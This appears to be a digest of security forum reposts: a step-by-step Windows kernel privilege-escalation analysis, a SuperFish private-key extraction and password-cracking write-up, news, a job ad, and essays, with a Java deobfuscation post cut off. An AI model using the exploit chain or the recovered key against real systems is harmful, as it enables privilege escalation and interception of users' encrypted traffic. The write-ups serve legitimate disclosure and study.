     A DIB (device-independent bitmap) is a format used to define device-independent bitmaps in various color resolutions... A DIB is normally transported in metafiles (usually using the StretchDIBits function), BMP files, and the Clipboard (CF_DIB data format)... The header actually consists of two adjoining parts: the header proper and the color table. Both are combined in the BITMAPINFO structure, which is what all DIB APIs expect.

     BITMAPINFO structure:

     biBitCount - The number of bits per pixel. The biBitCount member of the BITMAPINFOHEADER defines the maximum number of colors in the bitmap.
       4 - The bitmap has a maximum of 16 colors, and the bmiColors member of BITMAPINFO contains up to 16 entries.
       8 - The bitmap has a maximum of 256 colors, and the bmiColors member of BITMAPINFO contains up to 256 entries.
       16 - The bitmap has a maximum of 2^16 colors.
     bmiColors - An array of RGBQUAD (like PALETTEENTRY); the elements of the array make up the color table.

     These are the important fields. As mentioned in the MSDN description, the BITMAPINFO structure consists of a BITMAPINFOHEADER followed by a color table (bmiColors). The color table is just an array of integers, and its maximum size is specified by the biBitCount member. Now, if we create (for example) a DIB with a bit count of 4, we need to allocate 0x68 bytes of memory, because 0x28 bytes are used for the header (biSize) and 0x40 bytes are used for the color table (maximum number of entries * 4 = 0x10 (16 entries) * 4 = 0x40 bytes). This is all we need to know about DIBs, so the next thing to look at is the clipboard.

     The clipboard is used by applications to transfer data between them, for example when you copy and paste different formats such as text and pictures. There are so-called standard clipboard formats that are defined by the system. To place something on the clipboard, one has to call OpenClipboard first and then make a call to SetClipboardData, which takes the format (a constant value) as its first argument and a HANDLE to the data in the specified format as its second. To get something from the clipboard, we call GetClipboardData and pass the format we want. Another thing to know is that the clipboard can convert data between certain formats: if we request data in a format that is not on the clipboard, the system converts an available format to the requested one. For example, if we put normal text on the clipboard and request data in CF_UNICODETEXT format, the text gets converted to Unicode. Converting a special bitmap to a DIB, however, leads to uninitialized data being leaked. In order to reach the vulnerable function xxxBMPtoDIB in win32k, there needs to be a "dummy DIB" on the clipboard. This can be achieved by:

     1. Opening the clipboard.
     2. Emptying the clipboard.
     3. Placing a bitmap handle on the clipboard.
     4. Closing the clipboard (munging the clipboard data).

     We then proceed with these steps to leak uninitialized data:

     1. Reopen the clipboard.
     2. Place the special bitmap on the clipboard via SetClipboardData.
     3. Place some other required formats.
     4. Request data in the CF_DIB format via GetClipboardData to convert the bitmap to a DIB.

     We can repeat this procedure as many times as we wish. This allows us to reach a deterministic state in which the data being leaked is the same over and over again, giving us certainty that a valid object will indeed be allocated at the leaked address. While this works, the fact that we have to use the clipboard also has some caveats. Calling CreateBitmap with these arguments is all it takes:

     hbm = CreateBitmap(
               1,        // width
               1,        // height
               1,        // planes
               5,        // bitsPerPel
               ppvBits);

     Each bitmap that gets created usually has a BITMAP structure (userland) and a palette (in the kernel object) associated with it. Not in this case, though: this bitmap will have no palette associated with it, and the fourth parameter, bitsPerPel, gets rounded up to 8 for some reason and saved in the BITMAP structure. When converting the bitmap to a DIB, this is what happens in xxxBMPtoDIB:

     Figure 10: Inside xxxBMPtoDIB

     This function takes the bitmap we put on the clipboard earlier and uses the bitsPerPel BITMAP structure member from userland to calculate the size of the DIB color table. Remembering that the maximum number of entries of a DIB with biBitCount = 8 is 256, we can calculate the size as follows: 0x100 * 4 (color table) + 0x28 (header size) + 0x4 (imageSize) = 0x42c bytes.

     Figure 11: More xxxBMPtoDIB action

     Later in xxxBMPtoDIB, the above allocated buffer gets passed to GetDIBitsInternal.
     GreGetDIBitsInternalWorker would be responsible for initializing the color table at offset 0x28, but because that code is never reached (the function fails in bIsCompatible at the beginning, since the bitmap has no palette associated with it), it is possible to leak up to 0x404 bytes of uninitialized memory; only the first 0x28 bytes are initialized. This gives us enough power to read the internal object pointers of a palette and predict (or know) where the next palette gets allocated. By allocating palettes with 0xe5 entries and then deleting them again, we can force xxxBMPtoDIB to reuse the freed memory of the palette and leak the "this" pointer at offset 0x88:

     0x98 + 4 * 0xe5 = 0x42c bytes

     Once we have leaked the address of the target palette, we can just write it to the arbitraryFree member of the gestureInfo structure and call DestroyCursor to free the palette through CleanupCursorObject. One problem all of these objects face is that they do not get freed immediately, but instead get placed on the DeferredFreePool. This can be solved by allocating 32 objects of the desired size and then deleting them right after, to trigger a call to nt!ExDeferredFreePool, which finally releases the object we want to replace.

     Figure 12: Clearing out the DeferredFreePool

     Replacing the palette with our fake palette

     Luckily, there is a very convenient way to replace the freed palette: NtUserConvertMemHandle. This function copies the contents of a memory buffer from userland to kernelland on the PagedPool. The only thing we need to take into account is that the kernel buffer is not QWORD aligned, so the structure of the fake palette has to be adjusted a little. The shellcode gets stored in the palette entries array at offset 0x90, and the function pointer at offset 0x60 is overwritten to point to the array. It is then executed through NtGdiGetNearestPaletteIndex, but this doesn't work directly, because the PagedPool is not executable on Windows 8. This means we have to disable SMEP first to execute our shellcode in userland. To achieve this, the report references Sebastian Apelt's published Pwn2Own afd.sys privilege escalation write-up. We write the address of the HalDispatchTable into our fake palette at offset 0x80, where the palEntries pointer resides. We can then read the function pointer at HalDispatchTable+0x18 (via GetPaletteEntries), namely nt!ArbAddReserved, to calculate the address of nt!KiConfigureDynamicProcessor and use the instructions at its end as our ROP gadget. Finally, we overwrite the QueryIntervalProfile pointer with the gadget (via SetPaletteEntries) and execute the shellcode.

     To recap, the provided example performed the following:

     1. Leak the address of a palette object via clipboard format conversion.
     2. Create two cursors, CursorA and CursorB.
     3. Call NtUserLinkDpiCursor to link the cursors together.
     4. Destroy and free CursorB via NtUserDestroyCursor.
     5. Create a gestureInfo object of size 0xa0 on the PagedSessionPool to replace the freed CursorB.
     6. Destroy and free CursorA via NtUserDestroyCursor, freeing the target palette through CleanupCursorObject.
     7. Call NtUserConvertMemHandle to replace the freed palette of size 0x42c.
     8. Leak nt!ArbAddReserved from the HalDispatchTable to compute the ROP gadget address and evade ASLR.
     9. Write to nt!HalDispatchTable to overwrite the QueryIntervalProfile pointer with the gadget address from nt!KiConfigureDynamicProcessor as the ROP entry point.
     10. Execute the single-gadget ROP to disable SMEP.
     11. Return directly from the gadget to userland code and execute the shellcode.
     12. Shellcode: replace the current process token with the token of the SYSTEM process.

     As you can see, this was quite the write-up and amazing work from this researcher. Just another day at the office here at the Zero Day Initiative. Hope you enjoyed the work of this researcher as much as I did!
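The size coincidences this technique leans on are easy to double-check. A quick sanity check of the arithmetic quoted above (Python 3; the constant names are mine, the values are from the write-up):

```python
# Values quoted in the write-up; the names are illustrative.
GESTURE_INFO_SIZE = 0x30 + 0x40 + 0x30   # cbSize + cbExtraArgs + internal overhead
CURSOR_TRUE_SIZE = 0xa0                  # "the cursor is actually 0xa0 bytes big"
assert GESTURE_INFO_SIZE == CURSOR_TRUE_SIZE  # gestureInfo can replace the freed cursor

def palette_size(num_entries):
    # 0x98 basic object size + 4 bytes per palette entry
    return 0x98 + 4 * num_entries

# xxxBMPtoDIB buffer for biBitCount rounded up to 8:
# 256-entry color table + 0x28 header + 0x4 imageSize
DIB_BUFFER_SIZE = 0x100 * 4 + 0x28 + 0x4
assert DIB_BUFFER_SIZE == 0x42c

# A palette with 0xe5 entries occupies exactly the same 0x42c bytes,
# which is why the DIB conversion can reuse (and leak) the freed palette.
assert palette_size(0xe5) == DIB_BUFFER_SIZE

print(hex(DIB_BUFFER_SIZE))  # -> 0x42c
```

Matching allocation sizes are what make both replacements (gestureInfo for the cursor, the leaked buffer for the palette) land in the right pool slots.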
Sursa: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Just-another-day-at-the-office-A-ZDI-analyst-s-perspective-on/ba-p/6710637#.VOaHEXWUfHw
10. Blackshades malware co-creator pleads guilty

Kevin McCoy, USA TODAY 5:26 p.m. EST February 18, 2015

NEW YORK — Alex Yucel, the co-creator of the Blackshades malware that infected more than a half-million computers worldwide, pleaded guilty Wednesday in Manhattan federal court. The Swedish citizen faces up to 10 years in prison, plus thousands of dollars in forfeiture and restitution, for his role in a scheme federal investigators said distributed Blackshades to thousands of cybercriminals worldwide and harmed many computer users.

In an alleged scheme that ran from 2010-2013, conspirators installed Blackshades' Remote Access Tool — RAT — on the computers of unsuspecting users. The $40 program enabled them to access and view the victims' files, documents and photos, record keystrokes, steal passwords and even use the machines' cameras to spy on users. Blackshades users often sent electronic ransom notes to extort payments from victims for releasing the computers from secret control. Prosecutors said one such note warned: "Your computer has basically been hijacked, and your private files stored on your computer has now been encrypted, which means that they are impossible to access, and can only be decrypted/restored by us."

Yucel, 24, was arrested in Moldova in November 2013 and was subsequently extradited to the U.S. In an agreement with prosecutors, he pleaded guilty to one count of distributing malicious software during a 35-minute hearing before U.S. District Court Judge P. Kevin Castel.

Evidence amassed by federal investigators showed Yucel hired administrators, a marketing director and customer service representatives to build his Blackshades business. The operation rang up sales to thousands of users in more than 100 countries, generating more than $350,000 by April 2014, prosecutors charged.

Yucel, dressed in dark blue jail clothes, told Castel he had lived in Sweden and attended a university for two years as a computer science major.
"I do actually want to plead guilty," said Yucel. "I knew that the program ... would be used to cause damage." Had he gone to trial, Manhattan Assistant U.S. Attorney Sarah Lai said the government would have introduced transcripts of electronic chats between Yucel and an undercover federal agent, Blackshades marketing material and evidence of data stolen from computers. Although Yucel faces a maximum 10-year prison term, prosecutors and defense attorney Bradley Henry reached a stipulated agreement to imprisonment from 70 to 87 months. The final decision, however, rests with Castel, who set a tentative sentencing date of May 22. Henry said he will seek authorization for Yucel to serve the prison sentence and the period of supervised release in Sweden. A ruling on that request would be decided by the Department of Justice's Office of Enforcement Operations. Michael Hogue, the other co-creator of the Blackshades RAT program, and Brendan Johnston, a former Blackshades administrator, previously pleaded guilty and are awaiting sentencing. Sursa: Blackshades malware co-creator pleads guilty Justitia pulii. Nu e corect.
11. IT Service Desk - S.C. KPMG ROMANIA SRL

Offer type: Job
Career level: Entry
City: BUCURESTI
Field: IT / Telecom

IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: www.kpmg.com/ro/en/careers/careernews/pages/default.aspx

Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau, and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for? A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easily with KPMG staff, based on proficiency in English. The candidate should be a strong team player and possess very good time management and task follow-up skills. Moreover, they should demonstrate rigor in their daily routine while treating all staff requirements with solicitude.
Job objective

The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems, determine the source, and advise on appropriate action.

Responsibilities:
• Respond to requests for technical assistance in person, via phone, and email;
• Assist end-users with all IT applications and equipment related issues;
• Diagnose and resolve technical hardware and software issues, documenting resolutions for future reference;
• Determine the source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action;
• Serve as liaison between staff and the IT department to resolve issues;
• Perform hardware and software installations;
• Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to the appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates;
• Ensure, as part of the IT team, the proper operation of all IT and telecommunication equipment;
• Take part in the implementation of new IT applications and/or management information systems;
• Contribute to the development, improvement and implementation of new IT policies within the Firm and monitor staff compliance;
• Provide full end-user support in using customized specific IT applications;
• Deliver on-the-spot and/or regular IT assistance to staff.
Required skills:
• University degree in Information Technology or related sciences;
• At least 2 years prior work experience as a member of an IT team;
• Relevant work experience in hardware, software & communication troubleshooting;
• Knowledge of Windows 7/8 and Office applications; Microsoft certification desirable.

Performance standard requirements: Core Competencies defined for Infrastructure staff (link)

BestJobs: http://www.bestjobs.ro/locuri-de-munca-it-service-desk/215650/2

PS: Send me your CV if you are interested.
12. Extracting the SuperFish certificate

By Robert Graham

I extracted the certificate from the SuperFish adware and cracked the password ("komodia") that encrypted it. I discuss how down below. Note: this is probably trafficking in illegal access devices under the proposed revisions to the CFAA, so get it now before they change the law.

I used ghetto reversing to find the certificate. It was really easy. As reported by others, the program is packed and self-encrypted (like typical adware/malware). The proper way to reverse engineer this is to run the software in a debugger, setting a break point right after it decrypts itself. The goal is to set the right break point before it actually infects your machine -- reversers have been known to infect themselves this way. The ghetto way is to just run this on a machine, infecting yourself, and run "procdump" (by @markrussinovich) in order to dump the process's memory. That's what I did, by running the following command:

procdump -am VisualDiscovery.exe super.dmp

The proper reversing approach is to actually tear apart the memory structures. The ghetto reversing approach is to run strings. This is an ancient (mid-1980s) program that simply extracts human-readable strings out of a binary file, discarding the rest. It's really a stupid simple program.

strings super.dmp > super.txt

At that point, I loaded the file super.txt into a text editor and searched for the string "PRIVATE KEY". Sure enough, it popped right up. It's actually located several times in the memory dump. At this point, I copied/pasted the certificate into a file super.pem. I then attempted to look at it using OpenSSL. However, I was presented with a password prompt. This file has been encrypted with a password. Okay, that's annoying, but that just means we need to crack the password. However, I couldn't find a password cracker on the Internet that handles SSL PEM files, so I wrote my own certificate password cracker.
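The cracking loop itself is only a few lines. This is a sketch using Python's cryptography package rather than the author's single-threaded OpenSSL C tool (the package, the function, and the self-test below are my additions, not part of the original write-up):

```python
from cryptography.hazmat.primitives import serialization

def crack_pem(pem_data: bytes, wordlist):
    """Try each candidate password against an encrypted PEM private key.

    Returns the first password that successfully decrypts the key,
    or None if no candidate works.
    """
    for word in wordlist:
        try:
            serialization.load_pem_private_key(pem_data, password=word.encode())
            return word        # decryption succeeded
        except (ValueError, TypeError):
            continue           # wrong password, keep guessing
    return None
```

Feeding it the lower-case words filtered out of the memory dump would recover "komodia" the same way the author's tool did.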
It's pretty ghetto, using the OpenSSL decrypt API in a single thread, so it's not pretty. But it's sufficient for my needs. The encryption is actually pretty good, meaning I can only do a couple hundred guesses per second. This means there is no chance of brute-forcing any password longer than 5 characters (brute force means trying all possible combinations); it'd take billions of years. Instead, I want to do a dictionary attack. This is where I load a file of common words and test them one by one to see if they work. I tried the small dictionary john.dict that comes with John-the-Ripper, and it didn't find anything.

But of course, I don't need a real dictionary. The password is probably also in the clear in the memory dump. I could just use the file super.txt as my dictionary! I tried this, but it was taking a long time, with 150k unique lines of text. It'd take many hours to complete. To speed things up, I filtered the list for just lower-case words:

grep "^[a-z]*$" super.txt | sort | uniq > super.dict

This leaves a dictionary of only 2203 words. I ran my cracking tool, and found the password in 10 seconds: "komodia". Armed with this password, I continued where I left off with the openssl command-line tool and successfully decoded the certificate. I can now use this to man-in-the-middle people with Lenovo desktops (in theory, I haven't tried it yet).

Note that the password "komodia" is suggestive -- that's a company that makes an SSL "redirector" for doing exactly the sort of interception that SuperFish is doing. They market it as security software so you can spy on your kids, and stuff. (BTW, thanks to @chigley101 for linking a download of the software. Also note that @supersat and @paul_pearce found the password before I did, though as far as I know they haven't published it.)
13. Another update on the Truecrypt audit

There's a story on Hacker News asking what the hell is going on with the Truecrypt audit. I think that's a fair question, since we have been awfully quiet lately. To everyone who donated to the project, first accept my apologies for the slow pace. I want to promise you that we're not spending your money on tropical vacations (as appealing as that would be). In this post I'd like to offer you some news, including an explanation of why this has moved slowly.

For those of you who don't know what the Truecrypt audit is: in late 2013 Kenn White, myself, and a group of advisors started a project to undertake a crowdfunded audit of the Truecrypt disk encryption program. To the best of my knowledge, this is the first time anyone's tried this. The motivation for the audit is that lots of people use Truecrypt and depend on it for their security and safety -- yet the authors of the program are anonymous and somewhat mysterious to boot. Being anonymous and mysterious is not a crime, but it still seemed like a nice idea to take a look at their code.

We had an amazing response, collecting upwards of $70,000 in donations from a huge and diverse group of donors. We then went ahead and retained iSEC Partners to evaluate the bootloader and other vulnerability-prone areas of Truecrypt. The initial report was published here.

That initial effort was Part 1 of a two-part project. The second -- and much more challenging -- part involves a detailed look at the cryptography of Truecrypt, ranging from the symmetric encryption to the random number generator. We had some nice plans for this, and were well on our way to implementing them. (More on those in a second.) Then in late Spring of 2014, something bizarre happened. The Truecrypt developers pulled the plug on the entire product -- in their typical, mysterious way. This threw our plans for a loop. We had been planning a crowdsourced audit to be run by Thomas Ptacek and some others.
However, in the wake of TC pulling the plug, there were questions. Was this a good use of folks' time and resources? What about applying those resources to the new 'Truecrypt forks' that have sprung up (or are being developed)? There were a few other wrinkles as well, which Thomas talks about here -- although he takes on too much of the blame. It took us a while to recover from this and come up with a plan B that works within our budget and makes sense. We're now implementing this.

A few weeks ago we signed a contract with the newly formed NCC Group's Cryptography Services practice (which grew out of iSEC, Matasano and Intrepidus Group). The project will evaluate the original Truecrypt 7.1a, which serves as a baseline for the newer forks, and it will begin shortly. However, to minimize price -- and make your donations stretch farther -- we allowed the start date to be a bit flexible, which is why we don't have results yet.

In our copious spare time we've also been looking manually at some portions of the code, including the Truecrypt RNG and other parts of the cryptographic implementation. This will hopefully complement the NCC/iSEC work and offer a bit more confidence in the implementation.

I don't really have much more to say -- except to thank all of the donors for their contributions and their patience. This project has been a bit slower than any of us would like, but results are coming. Personally, my hope is that they'll be completely boring.

Posted by Matthew Green at 4:17 PM

Sursa: http://blog.cryptographyengineering.com/2015/02/another-update-on-truecrypt-audit.html
14. When Cryptographic API Design Goes Wrong

February 18, 2015 Ionuț Ambrosie

Whether we like to admit it or not, failing to account for human factors and usability issues when designing secure systems can have unwanted consequences. And while Security Usability is a broad field, today I'd like to focus on what I like to call the [lack of] usability of [some] cryptographic APIs.

A paper on SSL Certificate Validation

To get my point across, I'd like to bring forth a paper written in 2012 by Martin Georgiev, Subodh Iyengar, Suman Jana, Rishita Anubhai, Dan Boneh, and Vitaly Shmatikov, called The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software. In this paper, the authors claim and empirically confirm that SSL certificate validation is completely broken in many security-critical applications and libraries, meaning that any SSL connection initiated from any of these applications and libraries is insecure against a man-in-the-middle attack. They credit these vulnerabilities to badly designed APIs of SSL implementations and data-transport libraries, which present developers with a confusing array of settings and options.

Articol complet: http://securitycafe.ro/2015/02/18/when-cryptographic-api-design-goes-wrong/
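The paper's point about confusing option sets is easy to reproduce even with Python's own ssl module (my example, not one from the paper): a correctly configured context verifies both the certificate chain and the hostname, and two innocuous-looking attribute assignments silently turn all of it off.

```python
import ssl

# Secure by default: chain validation plus hostname checking.
ctx = ssl.create_default_context()
assert ctx.check_hostname is True
assert ctx.verify_mode == ssl.CERT_REQUIRED

# The kind of "setting" the paper warns about: after these two lines,
# any man-in-the-middle certificate is accepted without complaint.
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
```

Note the order matters: check_hostname must be disabled before verify_mode can be set to CERT_NONE, which is itself a small example of non-obvious API coupling.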
15. It's for "our safety"
16. Hey. Before making information public, bring proof as well.
17. If the NSA has been hacking everything, how has nobody seen them coming?

As the Snowden leaks continue to dribble out, it has become increasingly obvious that most nations planning for "cyber-war" have been merely sharpening knives for what looks like an almighty gunfight. We have to ask ourselves a few tough questions, the biggest of which just might be: "If the NSA was owning everything in sight (and by all accounts they have) then how is it that nobody ever spotted them?"

The Snowden docs show us that high value targets have been getting compromised forever, and while the game does heavily favour offence, how is it possible that defence hasn't racked up a single catch? The immediate conclusion for defensive vendors is that they are either ineffective or, worse, wilfully ignorant. However, for buyers of defensive software and gear, questions still remain.

The last dump, published by Der Spiegel on the 17th of January, went by pretty quietly (compared to previous releases), but the PDFs released contain a whole bunch of answers that might have slipped by unnoticed. We figured it would probably be worth discussing some of these, because if nothing else, they shine a light on areas defenders might have been previously ignoring. (This is especially true if you play at a level where nation state adversaries form part of your threat model, and, as the leaks show, the NSA targets commercial entities like mobile providers, so it's not just the domain of the spooks.)

The purpose of this post isn't to discuss the legality of the NSA's actions or the morality of the leaks; what we are trying to answer is: "Why did we never see it coming?" We think that the following reasons help to explain how this mass exploitation remained under the radar for so long:

1. Amazing adherence to classification/secrecy oaths;
2. You thought they were someone else;
3. You were looking at the wrong level;
4. Some beautiful misdirection;
5. They were playing chess & you were playing checkers;
6. Your "experts" failed you miserably.

1. Amazing adherence to classification/secrecy oaths

The air of secrecy surrounding the NSA has been amazingly impressive, and until recently they had truly earned their nickname of "No Such Agency." A large number of current speakers/trainers/practitioners in infosec have well acknowledged roots in the NSA. It was clear from their skill-sets and specialities that they were obviously involved with CNE/CNO in their previous lives. If one were to probe deeper, one could make even more guesses as to the scope of their previous activities (and by inference we would have obtained a low resolution snapshot of NSA activities):

Dave Aitel - Fuzzing & Exploit frameworks
Jamie Butler - Rootkits & Memory Corruption
Charlie Miller - Fuzzing & Exploitation

Reading through the Snowden documents, a bunch of "new" words has been introduced into our lexicon. Interdiction was relatively unheard of, and the word "implant" was almost never used in security circles, but has now fairly reliably replaced the ageing "rootkit". We have read the documents for a few hours and have adopted these words, but ex-NSA'ers have clearly lived with these words for years of their service. That the choice of wording has not bled far beyond the borders at Fort Meade is interesting and notable. It is an amazing adherence to classification and secrecy, deserves admiration, and has likely helped the NSA keep some of its secrets to date.

(This is to be expected: when innovation occurs out of sight, terminology diverges. When GCHQ cryptographers conceived early public-key crypto they called it "non-secret cryptography", however this was only revealed many years after "public-key" had become commonplace.
Now that "implant" is in the public domain (and is associated with the NSA), there seems little reason for vendors to continue with "rootkit".)

2. You thought they were someone else

Skilled adversaries operating under cover of a rioting mob is hardly a new tactic, and when one considers how much "bot" related activity is seen on the Internet, hiding amongst it is an obviously useful technique. The dump highlights two simple examples where the NSA leverages this technique.

Performing "4th party collection", we essentially have the NSA either passively or actively stealing intelligence from other intelligence agencies performing CNE. The fact that the foreign CNE can be parasitically leeched, actively ransacked or silently repurposed means that even attacks that use malware belonging to country-X, using TTPs that strongly point to country-X, could just be activity that should be attributed to the 4th party collection program.

Of course there's no need for the NSA to limit themselves to just making use of foreign intelligence agencies. Through DEFIANTWARRIOR you see them making active use of general purpose botnets too. With some details on how botnet hijacking works (sometimes in coordination with the FBI), their slides also offer telling advice on how to make use of this channel:

This raises two interesting points that are worth pondering. The first (obvious) one is that even regular cybercrime botnet activity could be masking a more comprehensive form of penetration, and the second is how much muddier it makes the waters of attribution. For the past few years, a great deal has been made of how Chinese IPs have been hacking the Western World. When one considers that the same slide deck made it clear that China had by far the greatest percentage of botnets, then we are forced to be more cautious when attributing attacks to China just because they originated from Chinese IPs. (We discussed our views on weakly evidenced China attribution previously [here] & [here].)

3. You were looking at the wrong level

A common criticism of the top tier security conferences is that they focus on attacks that are overly complex, while networks are still being compromised by un-patched servers and shared passwords. What the ANT catalogue and some of the leaks revealed is that sensitive networks have more than enough reason to fear complex attacks too. One of the most interesting documents in this regard appears to be taken from an internal Wiki, cataloguing ongoing projects (with calls for intern development assistance). The document starts off strong, and continues to deliver:

"TAO/ATO Persistence POLITERAIN (CNA) team is looking for interns who want to break things. We are tasked to remotely degrade or destroy opponent computers, routers, servers and network enabled devices by attacking the hardware using low level programming."

For most security teams, low level programming generally means shellcode and OS level attacks. A smaller subset of researchers will then aim at attacks targeting the Kernel. What we see here is a concerted effort to aim "lower":

"We are also always open for ideas but our focus is on firmware, BIOS, BUS or driver level attacks."

The rest of the document then goes on to mention projects like:

"we have discovered a way that may be able to remotely brick network cards... develop a deployable tool"
"erase the BIOS on a brand of servers that act as a backbone to many rival governments"
"create ARM-based SSD implants."
"covert storage product that is enabled from a hard drive firmware modification"
"create a firmware implant that has the ability to pass to and from an implant running in the OS"
"implants for the newest SEAGATE drives..", "for ARM-based Hitachi drives", "for ARM-based Fujitsu drives", "ARM-Samsung drives"
"capability to install a hard drive implant on a USB drive"
"pre-boot persistence.. of OSX"
"EFI module.."
"BERSERKR is a persistent backdoor that is implanted into the BIOS and runs from SMM"

All of this perfectly aligns with the CNO/GENIE document, which makes it clear that base resources in that project:

"will allow endpoint implants to persist in target computers/servers through technology upgrades, and enable the development of new methodologies to persist and maintain presence within hard target networks".

We have worked with a few companies who make religious use of whitelisting technologies and have dealt with some who would quickly discover altered system files on sensitive servers. We know a tinier subset of those who would verify the integrity of running hosts using offline examination, but organizations that are able to deal with implanted firmware or subverted BIOSes are few and far between. In the absence of hardware based TPMs, this is currently a research grade problem that most people don't even know they have.

4. Some beautiful misdirection

Even if we were completely underprepared as defenders, one would think that those cases where implants were communicating back to the NSA would have been discovered (even if by accident) sooner or later. Once more, the documents reveal why this would not have resulted in the classic "smoking gun".

A common IR process when an attack has been discovered is to determine where the exfiltrated data is going. In the most simplistic case (or if big budget movies are involved) this simple step could allow an analyst to say: "The data from this compromised host is going to HOST_B in country_X. So country_X is the culprit."

Of course, since even spirited teenagers have been making use of "jump hosts" since the 90's, a variation on this would be to base the attribution not just on the location of HOST_B, but on observing who then accesses HOST_B to "collect the loot". (It's the sort of time you really want to be the "global passive adversary".)
Even this would have tipped the NSA's hand sooner or later, and what we see from the docs is a clever variation on the theme: the use of an entirely new protocol, called FASHIONCLEFT, to effectively copy traffic off a network, attach metadata to it, then hide the packet within another packet allowed to exfil the targeted network. Tunnelling one type of traffic over another is not novel (although a 27 page interface control document for the protocol is cool), but this still leaves open the possibility that you would see victim_machine talking to HOST_X in Europe. This is where passive collection comes in.

This is beautiful! The data is munged into any packet that is likely to make it out of the network, and is then directed past a passive collector. This means that we can't rely on the host the data was sent to for attribution, and even if we did completely own the last hop, to see who shows up to grab the data, we would be watching in vain, because the deed was done when the packets traversed a network 3 hops ago. This really is an elegant solution and a beautiful sleight of hand. With the NSA controlling tens of thousands of passive hosts scattered around the Internet, good luck ever finding that smoking gun! (in their own words)

5. They were playing chess & you were playing checkers

What's very clear from the breadth of the information is just how out of their depth so many of the other players at this table are. Many are hilariously outgunned, playing on a field that has already been prepared, using tools that have already been rigged... and what's worse is that many of them don't even know this.

In 2010, we gave a presentation at the CCDCOE in Estonia to NATO folks. Our talk was titled: "Cyberwar - Why your threat model is probably wrong!"
(The talk has held up relatively well against the revelations, and is worth a quick read, even though it predated the discovery of STUXNET.)

One of the key takeaways from the talk (aside from the fact that any expert who refers to DDoS attacks when talking about cyberwar should be taken with a pinch of salt) was that real attackers build toolchains. Using examples from our pen-testing past, we pointed out how most of the tools we built went into modular toolchains. We mentioned that more than anything else, robust toolchains were the mark of a "determined, sponsored adversary".

Our conclusions from the talk were relatively simple: the nature of the game still heavily favours offence, and attacker toolchains were likely much more complex than the "sophisticated attacks" we had seen to date. When you look at the Snowden documents, if there is one word they scream, it's toolchains. If there are two words, it's "sophisticated toolchains".

The USA (and their Five Eyes partners) were clearly way ahead of the curve in spotting the usefulness of the Internet for tradecraft and, true to the motto of U.S. Cyber Command, have been expending resources to ensure "global network dominance". While organizations all over the world have struggled over the past few years to stand up SOCs (security operations centers) to act as central points for the detection and triage of attacks, the documents introduce us (for the first time) to its mirror image, in the form of a ROC:

From [media-35654.pdf]:

In terms of ROC capacity, the documents show us that in 2005 the ROC was 215 people strong, running a hundred active campaigns per day - in 2005! (that's generations ago in Internet years).
In an op-ed piece we penned for Al Jazeera in 2011, we mentioned that nation states following the headlines about the US training tons of cyber warriors (with the CEH certification, of all things) would be gravely mistaken: offensive capability had been brought to bear on nation-states long before the official launch of US Cybercom, and these docs validate those words.

In fact, if you are a nation state dipping your toes in these waters, it's worth considering the documented budgets for project GENIE, which we mentioned earlier. With an admittedly ambitious stated goal to "plan, equip and conduct Endpoint operations that actively compromise otherwise intractable targets", we can guess that project GENIE would cost a bit. Fortunately, we don't have to guess, and can see that in 2011, GENIE alone cost $615MM, with a combined headcount of about 1500 people. JUST. FOR. PROJECT. GENIE.

Of course, while debate rages about the morality of governments buying 0days (and while some may think this is a new concept), the same document shows that back in 2012, about $25MM was set aside for "community investment" & "covert purchases of software vulnerabilities". $25MM buys a whole lot of 3rd party 0day.

The possibly asymmetric nature of cyberwar means that small players are able to punch above their weight-class. What we see here is proof positive that the biggest kid in the room has been working on their punching for a long time…

6. Your "experts" failed you miserably

The Snowden leaks crossed over from infosec circles into the global zeitgeist, which meant international headlines and soundbites on CNN. This in turn has led to a sharp rise in the number of "CyberWar Experts" happy to trot out their opinions in exchange for their 15 minutes of fame. VC funding is rushing to the sector and every day we see more silver bullets and more experts show up... but it would behoove us to pause for a bit to examine the track records of these "experts".
How did they hold up against yesterday's headlines? I have seen 6 figure consultants trying to convince governments that 0days are never used, and have seen people talk of nation state hacking with nothing more than skinned Metasploit consoles and modern versions of Back Orifice. How many of the global "threat intelligence" companies are highlighting TTPs actually in use by apex predators (instead of merely spotting low hanging fruit)? If they are not, then we need to conclude that they are either uninformed or complicit in deluding us, and either option should cap the exorbitant fees many currently seek.

Conclusion?

The leaks give us an insight into the workings of a well refined offensive machine. The latest files show us why attributing attacks to the NSA will be difficult for a long time to come, and why "safe from nation state adversaries" requires a great deal more work, by people who are qualified to do so. If nothing else, the leaks reiterate the title from our 2010 talk: "Cyberwar... why your threat model is probably wrong".

[if you enjoy this update, you really should subscribe to ThinkstScapes]

Sursa: http://blog.thinkst.com/p/if-nsa-has-been-hacking-everything-how.html
  18. Automating Removal of Java Obfuscation By David Klein, 16 Feb. 2015 In this post we detail a method to improve analysis of Java code for a particular obfuscator; we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker: once the method is known, a methodology can be developed to automate the process. Introduction Obfuscation is the process of hiding application logic during compilation so that the logic of an application is difficult to follow. The reason for obfuscation is usually a result of vendors attempting to protect intellectual property, but it serves a dual purpose in slowing down vulnerability discovery. Obfuscation comes in many shapes and forms; in this post we focus on a particular subset: string obfuscation, more specifically encrypted string constants. Strings within an application are very useful for understanding logic; for example, logging strings and exception handling are an excellent window into how an application handles certain state and can greatly speed up efforts to understand functionality. For more information on what obfuscation is within the context of Java, see [0]. Note that the following entry assumes the reader has a rudimentary understanding of programming. Decompilation Firstly, we extract and load the Java archive (jar) using the tool JD-GUI [1] (a Windows based GUI tool that decompiles Java “.class” files); this is done by dragging and dropping the target jar into the GUI window. The following is what is shown after scrolling 